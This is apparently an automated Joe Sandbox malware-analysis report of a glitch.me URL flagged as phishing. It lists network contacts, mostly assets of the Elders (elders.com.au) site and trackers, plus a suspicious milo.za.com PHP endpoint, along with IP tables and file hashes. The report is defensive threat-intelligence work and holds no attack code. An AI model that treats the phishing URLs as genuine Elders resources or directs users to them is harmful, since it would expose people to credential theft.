                                                                  NameMaliciousAntivirus DetectionReputation
                                                                  https://connect.facebook.net/signals/config/253007270729203?v=2.9.176&r=stable&domain=elders.com.au&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113%2C201%2C200%2C202%2C207%2C208%2C209%2C205%2C197%2C132%2C134%2C163%2C196%2C198%2C122%2C157%2C145%2C151%2C129%2C233%2C116%2C126%2C127%2C234%2C165%2C119%2C236%2C166%2C136%2C123%2C154%2C148%2C193%2C114%2C128false
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://elders.com.au/content/dam/eld/icons---logos/icons/el-logo-2.svgfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-react.lc-2d7df618eb528a2ce626641aaccea776-lc.min.jsfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://elders.com.au/content/dam/eld/images/livestocknow/close_up_ram_head_horns.pngfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://yourir.info/lib/1.15.18/yourir.cssfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://elders.com.au/etc.clientlibs/aap2/aap2-core/clientlibs/v2/ax-fx-clientlibs-body.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.cssfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://apimprd.ext.elders.com.au/api/v1/WeatherDetail?postCode=5000false
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://connect.facebook.net/signals/config/842278510644971?v=2.9.176&r=stable&domain=elders.com.au&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113%2C201%2C200%2C202%2C207%2C208%2C209%2C205%2C197%2C132%2C134%2C163%2C196%2C198%2C122%2C157%2C145%2C151%2C129%2C233%2C116%2C126%2C127%2C234%2C165%2C119%2C236%2C166%2C136%2C123%2C154%2C148%2C193%2C114%2C128false
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://elders.com.au/etc.clientlibs/clientlibs/granite/utils.lc-899004cc02c33efc1f6694b1aee587fd-lc.min.jsfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://unpkg.com/react-dom@18/umd/react-dom.development.jsfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://unpkg.com/react-dom@18.3.1/umd/react-dom.development.jsfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.jsfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://elders.com.au/content/dam/eld/icons---logos/logos/Red_logo.pngfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.cssfalse
                                                                    high
                                                                    https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-base.lc-e592021eafd59de123415ab937a09f08-lc.min.jsfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://upload.wikimedia.org/wikipedia/commons/thumb/4/42/Adobe_Acrobat_DC_logo_2020.svg/384px-Adobe_Acrobat_DC_logo_2020.svg.pngfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://unpkg.com/react@18/umd/react.development.jsfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://dpm.demdex.net/ibs:dpid=411&dpuuid=ZynRTwAAAMtunQN-false
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://milo.za.com//pood/phpp4all.phpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://dpm.demdex.net/id?d_visid_ver=5.5.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_orgid=812E14B761A133470A495CCA%40AdobeOrg&d_nsid=0&ts=1730793803403false
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site.lc-46a2df1a9bfaeeffbd5b53738ed986e6-lc.min.jsfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-react/resources/static/media/Meta-Pro-Medium.afe5599c.ttffalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://elders.com.au/content/dam/eld/icons---logos/icons/branch-services/corporate-office-icon.pngfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://eldersrural.sc.omtrdc.net/b/ss/elders-prod-global/1/JS-2.27.0-LEWM/s87866206656359?AQB=1&ndh=1&pf=1&t=5%2F10%2F2024%203%3A3%3A25%202%20300&mid=55744627521858828850627066940577006981&aamlh=6&ce=UTF-8&cdp=3&fpCookieDomainPeriods=3&pageName=elders%3Ahomepage&g=https%3A%2F%2Felders.com.au%2F&r=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&c.&p_fo=3.0&getPageLoadTime=2.0.2&performanceWriteFull=1.0&performanceWritePart=1.0&performanceCheck=1.0&cm.&ssf=1&.cm&.c&cc=AUD&server=https%3A%2F%2Felders.com.au%2F&events=event1&aamb=6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y&c1=D%3Dv1&v1=elders&c2=D%3Dv2&v2=https%3A%2F%2Felders.com.au%2F&c3=D%3Dv4&v3=AEM&c4=D%3Dv5&v4=elders%3Ahomepage&c5=D%3Dv6&v5=https%3A%2F%2Felders.com.au%2F&c6=D%3Dv7&v6=Home&c7=D%3Dv8&c8=D%3Dv9&v8=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&c9=D%3Dv10&c10=D%3Dv11&c11=D%3Dv12&c13=D%3Dv14&v13=elders%20-%20home%20page&c14=D%3Dv15&c15=D%3Dv19&c16=D%3Dv17&c17=D%3Dv20&c18=D%3Dv21&v18=55744627521858828850627066940577006981&c24=D%3Dv26&v24=NaN&c25=D%3Dv27&c26=D%3Dv28&v200=production%3A2024-08-29T04%3A29%3A57Z&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&mcorgid=812E14B761A133470A495CCA%40AdobeOrg&AQE=1false
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://elders.com.au/content/dam/eld/images/homepage-banners/modern_home.jpgfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.facebook.com/tr/?id=1013340413305983&ev=PageView&dl=https%3A%2F%2Felders.com.au%2F&rl=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&if=false&ts=1730793804756&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.2.1730793804748.70395038985089435&cs_est=true&ler=other&cdl=API_unavailable&it=1730793802669&coo=false&rqm=GETfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://elders.com.au/content/dam/eld/images/homepage-banners/staff_background_wheat.jpgfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://elders.com.au/etc.clientlibs/foundation/clientlibs/jquery.lc-dd9b395c741ce2784096e26619e14910-lc.min.jsfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-cart.svgfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.cssfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-react/resources/static/media/icon-up-arrow.f3ebe431.svgfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://elders.com.au/.model.jsonfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                                    https://url.spec.whatwg.org/#url-parsingchromecache_138.2.dr, chromecache_155.2.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://developers.google.com/recaptcha/docs/faq#localhost_supportchromecache_199.2.dr, chromecache_173.2.drfalse
                                                                      high
                                                                      https://html.spec.whatwg.org/multipage/syntax.html#generate-implied-end-tagschromecache_138.2.dr, chromecache_155.2.drfalse
                                                                        high
                                                                        https://github.com/facebook/react/pull/22064.chromecache_138.2.dr, chromecache_137.2.dr, chromecache_155.2.dr, chromecache_195.2.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://reactjs.org/link/dangerously-set-inner-htmlchromecache_138.2.dr, chromecache_155.2.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://reactjs.org/link/warning-keyschromecache_138.2.dr, chromecache_137.2.dr, chromecache_155.2.dr, chromecache_195.2.drfalse
                                                                          high
                                                                          https://github.com/facebook/react/issues/13610chromecache_138.2.dr, chromecache_137.2.dr, chromecache_155.2.dr, chromecache_195.2.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://github.com/select2/select2/blob/master/LICENSE.mdchromecache_125.2.dr, chromecache_200.2.drfalse
                                                                            high
                                                                            https://github.com/facebook/react/issues/22459chromecache_138.2.dr, chromecache_155.2.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://v8.dev/blog/elements-kinds#avoid-creating-holeschromecache_138.2.dr, chromecache_155.2.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://kit.fontawesome.com/f6136e9b49.jschromecache_135.2.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://html.spec.whatwg.org/multipage/syntax.html#specialchromecache_138.2.dr, chromecache_155.2.drfalse
                                                                              high
                                                                              https://fontawesome.comchromecache_179.2.dr, chromecache_223.2.dr, chromecache_177.2.dr, chromecache_134.2.dr, chromecache_148.2.dr, chromecache_153.2.dr, chromecache_240.2.dr, chromecache_129.2.drfalse
                                                                                high
                                                                                https://github.com/twbs/bootstrap/graphs/contributors)chromecache_182.2.dr, chromecache_154.2.dr, chromecache_124.2.dr, chromecache_178.2.drfalse
                                                                                  high
                                                                                  https://support.google.com/recaptcha/#6175971chromecache_199.2.dr, chromecache_173.2.drfalse
                                                                                    high
                                                                                    http://ns.attribution.com/ads/1.0/chromecache_210.2.dr, chromecache_165.2.drfalse
                                                                                      high
                                                                                      https://github.com/facebook/react/issues/13188chromecache_138.2.dr, chromecache_155.2.drfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://www.eldersrealestate.com.au/&#34;chromecache_169.2.drfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://github.com/microsoft/claritychromecache_147.2.dr, chromecache_172.2.drfalse
                                                                                        high
                                                                                        https://reactjs.org/docs/react-api.html#reactchildrencountchromecache_137.2.dr, chromecache_195.2.drfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://support.google.com/recaptchachromecache_173.2.drfalse
                                                                                          high
                                                                                          https://upload.wikimedia.org/wikipedia/commons/thumb/4/42/Adobe_Acrobat_DC_logo_2020.svg/384px-Adobechromecache_135.2.drfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://developer.mozilla.org/en-US/docs/Web/API/AnimationEventchromecache_138.2.dr, chromecache_155.2.drfalse
                                                                                            high
                                                                                            https://developer.mozilla.org/en-US/docs/Web/API/EventTarget/addEventListener#Safely_detecting_optiochromecache_138.2.dr, chromecache_155.2.drfalse
                                                                                              high
                                                                                              https://reactjs.org/link/react-devtoolschromecache_155.2.drfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://www.gstatic.c..?/recaptcha/releases/-ZG7BC9TxCVEbzIO2m429usb/recaptcha__.chromecache_199.2.dr, chromecache_173.2.drfalse
                                                                                                high
                                                                                                https://github.com/facebook/react/issues/12502chromecache_138.2.dr, chromecache_155.2.drfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://github.com/facebook/react/issues/708.chromecache_138.2.dr, chromecache_155.2.drfalse
                                                                                                  high
                                                                                                  https://github.com/facebook/react/issues/12506chromecache_138.2.dr, chromecache_155.2.drfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://assets.adobedtm.com/728d44811931/14db0b582053/launch-f5e74cc94fc9.jschromecache_214.2.dr, chromecache_118.2.drfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://github.com/facebook/react/issues/14365chromecache_138.2.dr, chromecache_155.2.drfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://github.com/gnarf37/jquery-requestAnimationFramechromecache_222.2.dr, chromecache_116.2.drfalse
                                                                                                    high
                                                                                                    https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-quechromecache_199.2.dr, chromecache_173.2.drfalse
                                                                                                      high
                                                                                                      https://reactjs.org/link/error-boundarieschromecache_138.2.dr, chromecache_155.2.drfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://connect.facebook.net/chromecache_166.2.dr, chromecache_226.2.drfalse
                                                                                                        high
                                                                                                        https://reactjs.org/docs/react-api.html#reactchildrentoarraychromecache_137.2.dr, chromecache_195.2.drfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://reactjs.org/link/setstate-in-renderchromecache_138.2.dr, chromecache_155.2.drfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://html.spec.whatwg.org/multipage/syntax.html#parsing-main-inheadchromecache_138.2.dr, chromecache_155.2.drfalse
                                                                                                          high
                                                                                                          https://github.com/facebook/react/issues/3236).chromecache_137.2.dr, chromecache_195.2.drfalse
                                                                                                            high
                                                                                                            https://www.eldersrealestate.com.au/chromecache_169.2.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://infra.spec.whatwg.org/#ascii-tab-or-newlinechromecache_138.2.dr, chromecache_155.2.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://github.com/facebook/react/issues/12995chromecache_138.2.dr, chromecache_155.2.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://github.com/facebook/react/issues/21712).chromecache_138.2.dr, chromecache_155.2.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://html.spec.whatwg.org/multipage/semantics.html#the-html-elementchromecache_138.2.dr, chromecache_155.2.drfalse
                                                                                                              high
                                                                                                              https://github.com/facebook/react/issues/11918chromecache_138.2.dr, chromecache_155.2.drfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://reactjs.org/link/hooks-data-fetchingchromecache_138.2.dr, chromecache_155.2.drfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/chromecache_138.2.dr, chromecache_155.2.drfalse
                                                                                                                high
                                                                                                                https://ka-f.fontawesome.comchromecache_180.2.dr, chromecache_241.2.drfalse
                                                                                                                  high
                                                                                                                  https://reactjs.org/link/rules-of-hookschromecache_155.2.drfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://github.com/facebook/react/issues/20756chromecache_137.2.dr, chromecache_195.2.drfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://assets.adobedtm.com/728d44811931/14db0b582053/cbed442a9121/RCbad2c954d87f48819c96e16d0db6567chromecache_189.2.drfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://html.spec.whatwg.org/multipage/syntax.html#parsing-main-intrchromecache_138.2.dr, chromecache_155.2.drfalse
                                                                                                                    high
                                                                                                                    https://www.clarity.ms/tag/chromecache_169.2.drfalse
                                                                                                                      high
                                                                                                                      https://twitter.com/elderslimitedchromecache_169.2.drfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      http://www.linkedin.com/company/elderslimited/chromecache_169.2.drfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://cloud.google.com/contactchromecache_199.2.dr, chromecache_173.2.drfalse
                                                                                                                        high
                                                                                                                        https://fontawesome.com/license/freechromecache_179.2.dr, chromecache_223.2.dr, chromecache_177.2.dr, chromecache_134.2.dr, chromecache_148.2.dr, chromecache_153.2.dr, chromecache_240.2.dr, chromecache_129.2.drfalse
                                                                                                                          high
                                                                                                                          https://reactjs.org/link/react-polyfillschromecache_138.2.dr, chromecache_155.2.drfalse
                                                                                                                            high
                                                                                                                            https://html.spec.whatwg.org/multipage/syntax.html#parsing-main-inselectchromecache_138.2.dr, chromecache_155.2.drfalse
                                                                                                                              high
                                                                                                                              https://github.com/facebook/react/issues/11807chromecache_138.2.dr, chromecache_155.2.drfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://github.com/mozilla/gecko-dev/blob/4e638efc71/layout/style/test/property_database.jschromecache_138.2.dr, chromecache_155.2.drfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://html.spec.whatwg.org/multipage/syntax.html#parsing-main-inbodychromecache_138.2.dr, chromecache_155.2.drfalse
                                                                                                                                high
                                                                                                                                https://assets.adobedtm.com/extensions/EP8757b503532a44a68eee17773f6f10a0/AppMeasurement_Module_Actichromecache_232.2.dr, chromecache_230.2.drfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://reactjs.org/docs/react-api.html#createelementchromecache_137.2.dr, chromecache_195.2.drfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://html.spec.whatwg.org/multipage/syntax.html#parsing-main-incaptionchromecache_138.2.dr, chromecache_155.2.drfalse
                                                                                                                                  high
                                                                                                                                  https://github.com/facebook/react/pull/10676.chromecache_138.2.dr, chromecache_155.2.drfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://www.google.com/recaptcha/api2/chromecache_146.2.dr, chromecache_145.2.dr, chromecache_199.2.dr, chromecache_173.2.drfalse
                                                                                                                                    high
                                                                                                                                    https://github.com/facebook/react/pull/19216.chromecache_138.2.dr, chromecache_155.2.drfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    • No. of IPs < 25%
                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                    • 75% < No. of IPs
                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                    13.107.246.45
                                                                                                                                    s-part-0017.t-0009.t-msedge.netUnited States
                                                                                                                                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                    103.1.185.157
                                                                                                                                    unknownAustralia
                                                                                                                                    133159MAMMOTHMEDIA-AS-APMammothMediaPtyLtdAUfalse
                                                                                                                                    54.81.94.16
                                                                                                                                    astonishing-maize-sunstone.glitch.meUnited States
                                                                                                                                    14618AMAZON-AESUSfalse
                                                                                                                                    34.251.39.134
                                                                                                                                    dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comUnited States
                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                    104.17.249.203
                                                                                                                                    unpkg.comUnited States
                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                    34.250.133.195
                                                                                                                                    unknownUnited States
                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                    13.32.27.129
                                                                                                                                    d26p066pn2w0s0.cloudfront.netUnited States
                                                                                                                                    7018ATT-INTERNET4USfalse
                                                                                                                                    13.32.27.44
                                                                                                                                    unknownUnited States
                                                                                                                                    7018ATT-INTERNET4USfalse
                                                                                                                                    63.140.62.17
                                                                                                                                    eldersrural.sc.omtrdc.netUnited States
                                                                                                                                    15224OMNITUREUSfalse
                                                                                                                                    239.255.255.250
                                                                                                                                    unknownReserved
                                                                                                                                    unknownunknownfalse
                                                                                                                                    188.114.97.3
                                                                                                                                    unknownEuropean Union
                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                    157.240.253.35
                                                                                                                                    star-mini.c10r.facebook.comUnited States
                                                                                                                                    32934FACEBOOKUSfalse
                                                                                                                                    216.58.212.164
                                                                                                                                    unknownUnited States
                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                    45.76.112.20
                                                                                                                                    yourir.infoUnited States
                                                                                                                                    20473AS-CHOOPAUSfalse
                                                                                                                                    216.58.206.36
                                                                                                                                    unknownUnited States
                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                    185.15.59.240
                                                                                                                                    upload.wikimedia.orgNetherlands
                                                                                                                                    14907WIKIMEDIAUSfalse
                                                                                                                                    104.17.24.14
                                                                                                                                    cdnjs.cloudflare.comUnited States
                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                    54.72.201.156
                                                                                                                                    unknownUnited States
                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                    13.107.253.45
                                                                                                                                    s-part-0017.t-0009.fb-t-msedge.netUnited States
                                                                                                                                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                    142.250.185.132
                                                                                                                                    unknownUnited States
                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                    162.159.140.34
                                                                                                                                    elders.com.auUnited States
                                                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                                                    157.240.253.1
                                                                                                                                    scontent.xx.fbcdn.netUnited States
                                                                                                                                    32934FACEBOOKUSfalse
                                                                                                                                    104.17.247.203
                                                                                                                                    unknownUnited States
                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                    188.114.96.3
                                                                                                                                    milo.za.comEuropean Union
                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                    142.250.186.164
                                                                                                                                    www.google.comUnited States
                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                    157.240.251.35
                                                                                                                                    unknownUnited States
                                                                                                                                    32934FACEBOOKUSfalse
                                                                                                                                    IP
                                                                                                                                    192.168.2.4
                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                    Analysis ID:1549067
                                                                                                                                    Start date and time:2024-11-05 09:01:19 +01:00
                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                    Overall analysis duration:0h 3m 34s
                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                    Report type:full
                                                                                                                                    Cookbook file name:browseurl.jbs
                                                                                                                                    Sample URL:https://astonishing-maize-sunstone.glitch.me/
                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                    Number of analysed new started processes analysed:8
                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                    Technologies:
                                                                                                                                    • HCA enabled
                                                                                                                                    • EGA enabled
                                                                                                                                    • AMSI enabled
                                                                                                                                    Analysis Mode:default
                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                    Detection:MAL
                                                                                                                                    Classification:mal52.phis.win@19/198@87/27
                                                                                                                                    EGA Information:Failed
                                                                                                                                    HCA Information:
                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                    • Number of executed functions: 0
                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                    • Excluded IPs from analysis (whitelisted): 216.58.212.163, 142.250.74.206, 142.251.168.84, 34.104.35.123, 172.64.147.188, 104.18.40.68, 104.21.26.223, 172.67.139.119, 142.250.186.42, 142.250.186.138, 142.250.185.234, 142.250.186.170, 216.58.212.170, 142.250.186.74, 142.250.185.170, 142.250.185.202, 142.250.185.74, 172.217.16.138, 142.250.181.234, 172.217.18.106, 142.250.184.202, 172.217.23.106, 216.58.206.74, 142.250.185.138, 52.149.20.212, 2.19.126.137, 2.19.126.163, 192.229.221.95, 199.232.210.172, 20.242.39.171, 13.85.23.206, 93.184.221.240, 216.58.206.35, 142.250.186.106, 104.18.186.31, 104.18.187.31, 184.28.89.29, 172.217.18.3, 142.250.185.168, 104.18.27.50, 104.18.26.50, 142.250.186.163, 23.96.124.156, 52.210.64.198, 52.16.193.179, 52.30.115.192, 172.217.18.10, 172.217.16.202, 216.58.212.138, 216.58.206.42, 142.250.185.106, 142.250.184.234, 142.250.74.202, 142.250.74.195, 172.217.18.99
                                                                                                                                    • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, cdn.jsdelivr.net.cdn.cloudflare.net, ka-f.fontawesome.com.cdn.cloudflare.net, slscr.update.microsoft.com, otelrules.afd.azureedge.net, cn-assets.adobedtm.com.edgekey.net, clientservices.googleapis.com, clarity-ingest-eus-e-sc.eastus.cloudapp.azure.com, a767.dspw65.akamai.net, wu.azureedge.net, cdn.mouseflow.com.cdn.cloudflare.net, maps.googleapis.com, clients2.google.com, ocsp.digicert.com, www.googletagmanager.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, azurefd-t-prod.trafficmanager.net, www.gstatic.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, kit.fontawesome.com.cdn.cloudflare.net, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, ajax.goog
                                                                                                                                    • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                    • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                    • VT rate limit hit for: https://astonishing-maize-sunstone.glitch.me/
                                                                                                                                    No simulations
                                                                                                                                    No context
                                                                                                                                    No context
                                                                                                                                    No context
                                                                                                                                    No context
                                                                                                                                    No context
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:PNG image data, 30 x 31, 8-bit/color RGBA, non-interlaced
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):2373
                                                                                                                                    Entropy (8bit):6.9051491035012305
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:9Ra4knA9WIrCcOzZt091Anz3rDc3HKy309RJHdjEeSyL3dXXdbP1riiP4GhTeNb:93knmWIrCzZWnBHKj3JHdjv3d9bEixTI
                                                                                                                                    MD5:ED1B1A7DDF5060212D592E5105F8B197
                                                                                                                                    SHA1:460355D491FDEAF93A6549B40EB426B9E27D9F1D
